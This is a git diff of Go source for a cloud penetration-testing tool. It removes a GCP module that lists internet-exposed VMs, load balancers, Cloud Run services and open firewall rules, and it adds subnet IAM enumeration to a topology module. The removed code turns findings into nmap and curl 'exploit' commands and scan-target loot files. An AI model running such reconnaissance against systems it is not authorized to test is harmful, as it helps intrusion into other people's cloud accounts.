m.ExposedResources { - switch r.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d exposed resource(s) and %d firewall exposure(s): %d CRITICAL, %d HIGH", - len(m.ExposedResources), len(m.FirewallExposures), criticalCount, highCount), GCP_NETWORKEXPOSURE_MODULE_NAME) - - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *NetworkExposureModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Analyzing network exposure in project: %s", projectID), GCP_NETWORKEXPOSURE_MODULE_NAME) - } - - // 1. Find exposed compute instances - m.findExposedInstances(ctx, projectID, logger) - - // 2. Find exposed load balancers - m.findExposedLoadBalancers(ctx, projectID, logger) - - // 3. Find exposed Cloud Run services - m.findExposedCloudRun(ctx, projectID, logger) - - // 4. Analyze firewall rules for public exposure - m.analyzeFirewallExposure(ctx, projectID, logger) -} - -// findExposedInstances finds compute instances with external IPs -func (m *NetworkExposureModule) findExposedInstances(ctx context.Context, projectID string, logger internal.Logger) { - computeService, err := compute.NewService(ctx) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not create Compute service in project %s", projectID)) - return - } - - // List all instances across zones - req := computeService.Instances.AggregatedList(projectID) - err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { - for _, scopedList := range page.Items { - if scopedList.Instances == nil { - continue - } - for _, instance := range scopedList.Instances { - // Check for external IP - for _, ni := range instance.NetworkInterfaces { - for _, ac := range ni.AccessConfigs { - if ac.NatIP != "" { - exposed := ExposedResource{ - ResourceType: "compute_instance", - ResourceName: instance.Name, - ProjectID: projectID, - ExternalIP: ac.NatIP, - Protocol: "TCP/UDP", - } - - // Get service account - if len(instance.ServiceAccounts) > 0 { - exposed.ServiceAccount = instance.ServiceAccounts[0].Email - } - - // Determine risk level - exposed.RiskLevel, exposed.RiskReasons = m.classifyInstanceRisk(instance) - - // Generate exploit command - exposed.ExploitCommand = fmt.Sprintf("nmap -Pn -p- %s", ac.NatIP) - - m.mu.Lock() - m.ExposedResources = append(m.ExposedResources, exposed) - m.addExposedResourceToLoot(exposed) - m.mu.Unlock() - } - } - } - } - } - return nil - }) - - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not list instances in project %s", projectID)) - } -} - -// findExposedLoadBalancers finds load balancers with external IPs -func (m *NetworkExposureModule) findExposedLoadBalancers(ctx context.Context, projectID string, logger internal.Logger) { - computeService, err := compute.NewService(ctx) - if err != nil { - return - } - - // List global forwarding rules (external load balancers) - req := computeService.GlobalForwardingRules.List(projectID) - err = req.Pages(ctx, func(page *compute.ForwardingRuleList) error { - for _, rule := range page.Items { - if rule.IPAddress != "" { - exposed := ExposedResource{ - ResourceType: "load_balancer", - ResourceName: rule.Name, - ProjectID: projectID, - ExternalIP: rule.IPAddress, - ExposedPorts: []string{rule.PortRange}, - Protocol: rule.IPProtocol, - TLSEnabled: strings.ToLower(rule.IPProtocol) == "https" || rule.PortRange == "443", - } - - // Determine risk level - exposed.RiskLevel = "MEDIUM" - exposed.RiskReasons = []string{"External load balancer"} - - if !exposed.TLSEnabled && rule.PortRange != "80" { - exposed.RiskLevel = "HIGH" - exposed.RiskReasons = append(exposed.RiskReasons, "No TLS/HTTPS") - } - - exposed.ExploitCommand = fmt.Sprintf("curl -v http://%s", rule.IPAddress) - - m.mu.Lock() - m.ExposedResources = append(m.ExposedResources, exposed) - m.addExposedResourceToLoot(exposed) - m.mu.Unlock() - } - } - return nil - }) - - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) - } -} - -// findExposedCloudRun finds Cloud Run services with public access -func (m *NetworkExposureModule) findExposedCloudRun(ctx context.Context, projectID string, logger internal.Logger) { - runService, err := run.NewService(ctx) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) - return - } - - // List Cloud Run services - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := runService.Projects.Locations.Services.List(parent).Do() - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) - return - } - - for _, service := range resp.Items { - // Check if service is publicly accessible - isPublic := false - if service.Spec != nil && service.Spec.Template != nil { - // Check IAM policy or ingress settings - // For simplicity, we check if the service has a URL - if service.Status != nil && service.Status.Url != "" { - isPublic = true - } - } - - if isPublic && service.Status != nil && service.Status.Url != "" { - exposed := ExposedResource{ - ResourceType: "cloud_run", - ResourceName: service.Metadata.Name, - ProjectID: projectID, - FQDN: service.Status.Url, - ExposedPorts: []string{"443"}, - Protocol: "HTTPS", - TLSEnabled: true, - } - - // Get service account - if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { - exposed.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName - } - - // Determine risk level - exposed.RiskLevel = "MEDIUM" - exposed.RiskReasons = []string{"Public Cloud Run service"} - - // Check for allUsers invoker - // This would require checking IAM policy - exposed.ExploitCommand = fmt.Sprintf("curl -v %s", service.Status.Url) - - m.mu.Lock() - m.ExposedResources = append(m.ExposedResources, exposed) - m.addExposedResourceToLoot(exposed) - m.mu.Unlock() - } - } -} - -// analyzeFirewallExposure analyzes firewall rules for public exposure -func (m *NetworkExposureModule) analyzeFirewallExposure(ctx context.Context, projectID string, logger internal.Logger) { - computeService, err := compute.NewService(ctx) - if err != nil { - return - } - - req := computeService.Firewalls.List(projectID) - err = req.Pages(ctx, func(page *compute.FirewallList) error { - for _, fw := range page.Items { - // Check if rule allows ingress from 0.0.0.0/0 - isPublic := false - for _, sr := range fw.SourceRanges { - if sr == "0.0.0.0/0" { - isPublic = true - break - } - } - - if isPublic && fw.Direction == "INGRESS" { - exposure := FirewallExposure{ - RuleName: fw.Name, - ProjectID: projectID, - Network: fw.Network, - Direction: fw.Direction, - SourceRanges: fw.SourceRanges, - TargetTags: fw.TargetTags, - IsPublic: true, - } - - // Get allowed ports - for _, allowed := range fw.Allowed { - exposure.Protocol = allowed.IPProtocol - for _, port := range allowed.Ports { - exposure.Ports = append(exposure.Ports, port) - } - } - - // Determine risk level - exposure.RiskLevel, exposure.RiskReasons = m.classifyFirewallRisk(exposure) - - m.mu.Lock() - m.FirewallExposures = append(m.FirewallExposures, exposure) - m.addFirewallExposureToLoot(exposure) - m.mu.Unlock() - } - } - return nil - }) - - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, - fmt.Sprintf("Could not list firewall rules in project %s", projectID)) - } -} - -// classifyInstanceRisk determines the risk level of an exposed instance -func (m *NetworkExposureModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { - var reasons []string - score := 0 - - // Check for default service account - for _, sa := range instance.ServiceAccounts { - if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine SA") - score += 2 - } - - // Check for broad scopes - for _, scope := range sa.Scopes { - if scope == "https://www.googleapis.com/auth/cloud-platform" { - reasons = append(reasons, "Has cloud-platform scope (full access)") - score += 3 - } - } - } - - // External IP is always a risk - reasons = append(reasons, "Has external IP") - score += 1 - - if score >= 4 { - return "CRITICAL", reasons - } else if score >= 2 { - return "HIGH", reasons - } - return "MEDIUM", reasons -} - -// classifyFirewallRisk determines the risk level of a firewall exposure -func (m *NetworkExposureModule) classifyFirewallRisk(exposure FirewallExposure) (string, []string) { - var reasons []string - score := 0 - - // Check for dangerous ports - dangerousPorts := map[string]string{ - "22": "SSH", - "3389": "RDP", - "3306": "MySQL", - "5432": "PostgreSQL", - "27017": "MongoDB", - "6379": "Redis", - "9200": "Elasticsearch", - "8080": "HTTP Alt", - } - - for _, port := range exposure.Ports { - if name, ok := dangerousPorts[port]; ok { - reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) - score += 3 - } - } - - // Check for wide port ranges - for _, port := range exposure.Ports { - if strings.Contains(port, "-") { - reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) - score += 2 - } - } - - // Check for no target tags (applies to all instances) - if len(exposure.TargetTags) == 0 { - reasons = append(reasons, "No target tags (applies to all instances)") - score += 2 - } - - // 0.0.0.0/0 is always a risk - reasons = append(reasons, "Allows traffic from 0.0.0.0/0") - score += 1 - - if score >= 5 { - return "CRITICAL", reasons - } else if score >= 3 { - return "HIGH", reasons - } - return "MEDIUM", reasons -} - -// generateSummaries creates exposure summaries by resource type -func (m *NetworkExposureModule) generateSummaries() { - typeCount := make(map[string]*ExposureSummary) - - for _, r := range m.ExposedResources { - if _, exists := typeCount[r.ResourceType]; !exists { - typeCount[r.ResourceType] = &ExposureSummary{ - ResourceType: r.ResourceType, - } - } - typeCount[r.ResourceType].Count++ - if r.RiskLevel == "CRITICAL" { - typeCount[r.ResourceType].CriticalCount++ - } else if r.RiskLevel == "HIGH" { - typeCount[r.ResourceType].HighCount++ - } - } - - for _, summary := range typeCount { - m.Summaries = append(m.Summaries, *summary) - } - - // Sort by count - sort.Slice(m.Summaries, func(i, j int) bool { - return m.Summaries[i].Count > m.Summaries[j].Count - }) -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *NetworkExposureModule) initializeLootFiles() { - m.LootMap["exposure-critical"] = &internal.LootFile{ - Name: "exposure-critical", - Contents: "# Critical Network Exposures\n# Generated by CloudFox\n# These require immediate attention!\n\n", - } - m.LootMap["exposure-management-ports"] = &internal.LootFile{ - Name: "exposure-management-ports", - Contents: "# Exposed Management Ports\n# Generated by CloudFox\n# SSH, RDP, Database ports exposed to internet\n\n", - } - m.LootMap["exposure-scan-targets"] = &internal.LootFile{ - Name: "exposure-scan-targets", - Contents: "# Scan Targets\n# Generated by CloudFox\n# Use for authorized penetration testing\n\n", - } - m.LootMap["exposure-remediation"] = &internal.LootFile{ - Name: "exposure-remediation", - Contents: "# Remediation Commands\n# Generated by CloudFox\n\n", - } -} - -func (m *NetworkExposureModule) addExposedResourceToLoot(resource ExposedResource) { - // Critical exposures - if resource.RiskLevel == "CRITICAL" { - m.LootMap["exposure-critical"].Contents += fmt.Sprintf( - "## %s: %s\n"+ - "Project: %s\n"+ - "IP/FQDN: %s%s\n"+ - "Risk Reasons:\n", - resource.ResourceType, - resource.ResourceName, - resource.ProjectID, - resource.ExternalIP, - resource.FQDN, - ) - for _, reason := range resource.RiskReasons { - m.LootMap["exposure-critical"].Contents += fmt.Sprintf(" - %s\n", reason) - } - m.LootMap["exposure-critical"].Contents += fmt.Sprintf("Exploit: %s\n\n", resource.ExploitCommand) - } - - // Scan targets - target := resource.ExternalIP - if target == "" { - target = resource.FQDN - } - if target != "" { - m.LootMap["exposure-scan-targets"].Contents += fmt.Sprintf( - "%s # %s (%s)\n", - target, - resource.ResourceName, - resource.ResourceType, - ) - } -} - -func (m *NetworkExposureModule) addFirewallExposureToLoot(exposure FirewallExposure) { - // Management ports - dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} - for _, port := range exposure.Ports { - for _, dp := range dangerousPorts { - if port == dp || strings.HasPrefix(port, dp+"-") { - m.LootMap["exposure-management-ports"].Contents += fmt.Sprintf( - "## Firewall Rule: %s\n"+ - "Project: %s\n"+ - "Port: %s\n"+ - "Source: %s\n"+ - "Risk: %s\n\n", - exposure.RuleName, - exposure.ProjectID, - port, - strings.Join(exposure.SourceRanges, ", "), - exposure.RiskLevel, - ) - break - } - } - } - - // Remediation - if exposure.RiskLevel == "CRITICAL" || exposure.RiskLevel == "HIGH" { - m.LootMap["exposure-remediation"].Contents += fmt.Sprintf( - "# Fix firewall rule: %s\n"+ - "gcloud compute firewall-rules update %s --source-ranges= --project=%s\n"+ - "# Or delete if unnecessary:\n"+ - "# gcloud compute firewall-rules delete %s --project=%s\n\n", - exposure.RuleName, - exposure.RuleName, - exposure.ProjectID, - exposure.RuleName, - exposure.ProjectID, - ) - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort resources by risk level - sort.Slice(m.ExposedResources, func(i, j int) bool { - riskOrder := map[string]int{"CRITICAL": 4, "HIGH": 3, "MEDIUM": 2, "LOW": 1} - return riskOrder[m.ExposedResources[i].RiskLevel] > riskOrder[m.ExposedResources[j].RiskLevel] - }) - - // Exposed resources table - resourcesHeader := []string{ - "Type", - "Name", - "Project Name", - "Project ID", - "IP/FQDN", - "Ports", - "TLS", - "Risk", - } - - var resourcesBody [][]string - for _, r := range m.ExposedResources { - endpoint := r.ExternalIP - if endpoint == "" { - endpoint = r.FQDN - } - tls := "No" - if r.TLSEnabled { - tls = "Yes" - } - resourcesBody = append(resourcesBody, []string{ - r.ResourceType, - r.ResourceName, - m.GetProjectName(r.ProjectID), - r.ProjectID, - truncateString(endpoint, 40), - strings.Join(r.ExposedPorts, ","), - tls, - r.RiskLevel, - }) - } - - // Firewall exposures table - firewallHeader := []string{ - "Rule", - "Project Name", - "Project ID", - "Ports", - "Protocol", - "Target Tags", - "Risk", - } - - var firewallBody [][]string - for _, f := range m.FirewallExposures { - firewallBody = append(firewallBody, []string{ - f.RuleName, - m.GetProjectName(f.ProjectID), - f.ProjectID, - strings.Join(f.Ports, ","), - f.Protocol, - strings.Join(f.TargetTags, ","), - f.RiskLevel, - }) - } - - // Summary table - summaryHeader := []string{ - "Resource Type", - "Total", - "Critical", - "High", - } - - var summaryBody [][]string - for _, s := range m.Summaries { - summaryBody = append(summaryBody, []string{ - s.ResourceType, - fmt.Sprintf("%d", s.Count), - fmt.Sprintf("%d", s.CriticalCount), - fmt.Sprintf("%d", s.HighCount), - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{} - - if len(resourcesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "exposure-resources", - Header: resourcesHeader, - Body: resourcesBody, - }) - } - - if len(firewallBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "exposure-firewall", - Header: firewallHeader, - Body: firewallBody, - }) - } - - if len(summaryBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "exposure-summary", - Header: summaryHeader, - Body: summaryBody, - }) - } - - output := NetworkExposureOutput{ - Table: tables, - Loot: lootFiles, - } - - // Build scopeNames using GetProjectName - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - // Write output - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 6d8f750b..dd28c62c 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -73,6 +73,12 @@ type Subnet struct { Purpose string Role string StackType string + IAMBindings []SubnetIAMBinding +} + +type SubnetIAMBinding struct { + Role string + Member string } type VPCPeering struct { @@ -109,14 +115,6 @@ type CloudNATConfig struct { EnableLogging bool } -type TrustBoundary struct { - Name string - Type string // "vpc-peering", "shared-vpc", "service-perimeter" - SourceScope string - TargetScope string - RiskLevel string - Details string -} type NetworkRoute struct { Name string @@ -135,16 +133,14 @@ type NetworkRoute struct { type NetworkTopologyModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Networks []VPCNetwork - Subnets []Subnet - Peerings []VPCPeering - SharedVPCs map[string]*SharedVPCConfig - NATs []CloudNATConfig - TrustBoundarie []TrustBoundary - Routes []NetworkRoute - LootMap map[string]*internal.LootFile - mu sync.Mutex + Networks []VPCNetwork + Subnets []Subnet + Peerings []VPCPeering + SharedVPCs map[string]*SharedVPCConfig + NATs []CloudNATConfig + Routes []NetworkRoute + LootMap map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -170,15 +166,14 @@ func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { // Create module instance module := &NetworkTopologyModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Networks: []VPCNetwork{}, - Subnets: []Subnet{}, - Peerings: []VPCPeering{}, - SharedVPCs: make(map[string]*SharedVPCConfig), - NATs: []CloudNATConfig{}, - TrustBoundarie: []TrustBoundary{}, - Routes: []NetworkRoute{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []VPCNetwork{}, + Subnets: []Subnet{}, + Peerings: []VPCPeering{}, + SharedVPCs: make(map[string]*SharedVPCConfig), + NATs: []CloudNATConfig{}, + Routes: []NetworkRoute{}, + LootMap: make(map[string]*internal.LootFile), } // Initialize loot files @@ -192,8 +187,6 @@ func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Mapping network topology and trust boundaries...", GCP_NETWORKTOPOLOGY_MODULE_NAME) - // Create Compute client computeService, err := compute.NewService(ctx) if err != nil { @@ -212,23 +205,15 @@ func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Log } wg.Wait() - // Analyze trust boundaries - m.analyzeTrustBoundaries(logger) - // Check results if len(m.Networks) == 0 { logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Mapped %d VPC network(s), %d subnet(s), %d peering(s)", - len(m.Networks), len(m.Subnets), len(m.Peerings)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.NATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) - if len(m.TrustBoundarie) > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d trust boundary relationship(s)", len(m.TrustBoundarie)), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } - - // Write output m.writeOutput(ctx, logger) } @@ -319,12 +304,13 @@ func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID if subnetList.Subnetworks == nil { continue } + regionName := m.extractRegionFromURL(region) for _, subnet := range subnetList.Subnetworks { subnetRecord := Subnet{ Name: subnet.Name, ProjectID: projectID, Network: subnet.Network, - Region: m.extractRegionFromURL(region), + Region: regionName, IPCIDRRange: subnet.IpCidrRange, PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, Purpose: subnet.Purpose, @@ -343,6 +329,9 @@ func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange)) } + // Get IAM bindings for the subnet + subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name) + m.mu.Lock() m.Subnets = append(m.Subnets, subnetRecord) m.mu.Unlock() @@ -358,6 +347,28 @@ func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID } } +// getSubnetIAMBindings retrieves IAM bindings for a subnet +func (m *NetworkTopologyModule) getSubnetIAMBindings(ctx context.Context, computeService *compute.Service, projectID, region, subnetName string) []SubnetIAMBinding { + policy, err := computeService.Subnetworks.GetIamPolicy(projectID, region, subnetName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []SubnetIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, SubnetIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { req := computeService.Routes.List(projectID) err := req.Pages(ctx, func(page *compute.RouteList) error { @@ -506,86 +517,6 @@ func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectI } } -// ------------------------------ -// Trust Boundary Analysis -// ------------------------------ -func (m *NetworkTopologyModule) analyzeTrustBoundaries(logger internal.Logger) { - // Analyze VPC peering trust boundaries - for _, peering := range m.Peerings { - boundary := TrustBoundary{ - Name: peering.Name, - Type: "vpc-peering", - SourceScope: fmt.Sprintf("projects/%s/networks/%s", peering.ProjectID, m.extractNetworkName(peering.Network)), - TargetScope: peering.PeerNetwork, - } - - // Assess risk level - if peering.ProjectID != peering.PeerProjectID { - boundary.RiskLevel = "HIGH" - boundary.Details = "Cross-project VPC peering enables network connectivity between different projects" - } else { - boundary.RiskLevel = "MEDIUM" - boundary.Details = "Same-project VPC peering enables connectivity between networks" - } - - // Check route sharing - if peering.ExportCustomRoute || peering.ImportCustomRoute { - boundary.Details += "; Custom routes are shared" - } - - m.mu.Lock() - m.TrustBoundarie = append(m.TrustBoundarie, boundary) - m.mu.Unlock() - - // Add to loot - m.addTrustBoundaryToLoot(boundary) - } - - // Analyze Shared VPC trust boundaries - for hostProject, config := range m.SharedVPCs { - for _, serviceProject := range config.ServiceProjects { - boundary := TrustBoundary{ - Name: fmt.Sprintf("shared-vpc-%s-%s", hostProject, serviceProject), - Type: "shared-vpc", - SourceScope: fmt.Sprintf("projects/%s", hostProject), - TargetScope: fmt.Sprintf("projects/%s", serviceProject), - RiskLevel: "MEDIUM", - Details: fmt.Sprintf("Shared VPC: %s provides network resources to %s", hostProject, serviceProject), - } - - m.mu.Lock() - m.TrustBoundarie = append(m.TrustBoundarie, boundary) - m.mu.Unlock() - - m.addTrustBoundaryToLoot(boundary) - } - } - - // Analyze routes for potential trust issues - for _, route := range m.Routes { - if route.NextHopType == "vpn" || route.NextHopType == "peering" { - boundary := TrustBoundary{ - Name: route.Name, - Type: "network-route", - SourceScope: route.Network, - TargetScope: route.NextHop, - RiskLevel: "LOW", - Details: fmt.Sprintf("Route to %s via %s", route.DestRange, route.NextHopType), - } - - // Elevated risk for default route (0.0.0.0/0) going through external paths - if route.DestRange == "0.0.0.0/0" && (route.NextHopType == "vpn" || route.NextHopType == "peering") { - boundary.RiskLevel = "HIGH" - boundary.Details = fmt.Sprintf("Default route (%s) via %s - all internet traffic routes through external path", - route.DestRange, route.NextHopType) - } - - m.mu.Lock() - m.TrustBoundarie = append(m.TrustBoundarie, boundary) - m.mu.Unlock() - } - } -} // ------------------------------ // Helper Functions @@ -629,49 +560,12 @@ func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { // Loot File Management // ------------------------------ func (m *NetworkTopologyModule) initializeLootFiles() { - m.LootMap["network-topology"] = &internal.LootFile{ - Name: "network-topology", - Contents: "# Network Topology Map\n# Generated by CloudFox\n\n", - } - m.LootMap["peering-analysis"] = &internal.LootFile{ - Name: "peering-analysis", - Contents: "# VPC Peering Analysis\n# Generated by CloudFox\n\n", - } - m.LootMap["shared-vpc-commands"] = &internal.LootFile{ - Name: "shared-vpc-commands", - Contents: "# Shared VPC Analysis Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["trust-boundaries"] = &internal.LootFile{ - Name: "trust-boundaries", - Contents: "# Trust Boundary Analysis\n# Generated by CloudFox\n\n", - } - m.LootMap["nat-analysis"] = &internal.LootFile{ - Name: "nat-analysis", - Contents: "# Cloud NAT Configuration Analysis\n# Generated by CloudFox\n\n", + m.LootMap["network-topology-commands"] = &internal.LootFile{ + Name: "network-topology-commands", + Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } -func (m *NetworkTopologyModule) addTrustBoundaryToLoot(boundary TrustBoundary) { - m.mu.Lock() - defer m.mu.Unlock() - - m.LootMap["trust-boundaries"].Contents += fmt.Sprintf( - "## %s (%s)\n"+ - "Type: %s\n"+ - "Source: %s\n"+ - "Target: %s\n"+ - "Risk Level: %s\n"+ - "Details: %s\n\n", - boundary.Name, - boundary.RiskLevel, - boundary.Type, - boundary.SourceScope, - boundary.TargetScope, - boundary.RiskLevel, - boundary.Details, - ) -} - // ------------------------------ // Output Generation // ------------------------------ @@ -686,9 +580,9 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal // VPC Networks table networksHeader := []string{ - "Network", "Project Name", "Project ID", + "Network", "Routing Mode", "Subnets", "Peerings", @@ -704,9 +598,9 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal } networksBody = append(networksBody, []string{ - n.Name, m.GetProjectName(n.ProjectID), n.ProjectID, + n.Name, n.RoutingMode, fmt.Sprintf("%d", n.SubnetCount), fmt.Sprintf("%d", n.PeeringCount), @@ -714,23 +608,26 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal fmt.Sprintf("%d", n.MTU), }) - // Add to topology loot - m.LootMap["network-topology"].Contents += fmt.Sprintf( - "## VPC: %s (%s)\n"+ - "Routing Mode: %s\n"+ - "Subnets: %d\n"+ - "Peerings: %d\n"+ - "Shared VPC: %s\n\n", + // Add network commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Network: %s (Project: %s)\n"+ + "# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List firewall rules for network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, n.Name, n.ProjectID, - n.RoutingMode, - n.SubnetCount, - n.PeeringCount, - sharedVPC, ) } - // Subnets table + // Subnets table - one row per IAM binding if present, otherwise one row per subnet subnetsHeader := []string{ + "Project Name", + "Project ID", "Subnet", "Network", "Region", @@ -738,6 +635,8 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal "Private Google Access", "Flow Logs", "Purpose", + "IAM Role", + "IAM Member", } var subnetsBody [][]string @@ -747,19 +646,57 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal purpose = "PRIVATE" } - subnetsBody = append(subnetsBody, []string{ - s.Name, - m.extractNetworkName(s.Network), - s.Region, - s.IPCIDRRange, - fmt.Sprintf("%t", s.PrivateIPGoogleAccess), - fmt.Sprintf("%t", s.FlowLogsEnabled), - purpose, - }) + if len(s.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range s.IAMBindings { + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + "-", + "-", + }) + } + + // Add subnet commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Subnet: %s (Project: %s, Region: %s)\n"+ + "# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ + "# Get subnet IAM policy:\n"+ + "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", + s.Name, s.ProjectID, s.Region, + s.Name, s.Region, s.ProjectID, + s.Name, s.Region, s.ProjectID, + ) } // VPC Peerings table peeringsHeader := []string{ + "Project Name", + "Project ID", "Name", "Local Network", "Peer Network", @@ -772,60 +709,40 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal var peeringsBody [][]string for _, p := range m.Peerings { peeringsBody = append(peeringsBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, p.Name, m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, p.State, - fmt.Sprintf("%t", p.ImportCustomRoute), - fmt.Sprintf("%t", p.ExportCustomRoute), + boolToYesNo(p.ImportCustomRoute), + boolToYesNo(p.ExportCustomRoute), }) - // Add to peering analysis loot - m.LootMap["peering-analysis"].Contents += fmt.Sprintf( - "## Peering: %s\n"+ - "Local: %s\n"+ - "Peer: %s (project: %s)\n"+ - "State: %s\n"+ - "Custom Routes - Import: %t, Export: %t\n\n"+ - "# Commands to analyze:\n"+ - "gcloud compute networks peerings list --project=%s\n"+ - "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n", - p.Name, - m.extractNetworkName(p.Network), - m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, - p.State, - p.ImportCustomRoute, p.ExportCustomRoute, + // Add peering commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Peering: %s (Project: %s)\n"+ + "# Local: %s -> Peer: %s (project: %s)\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# 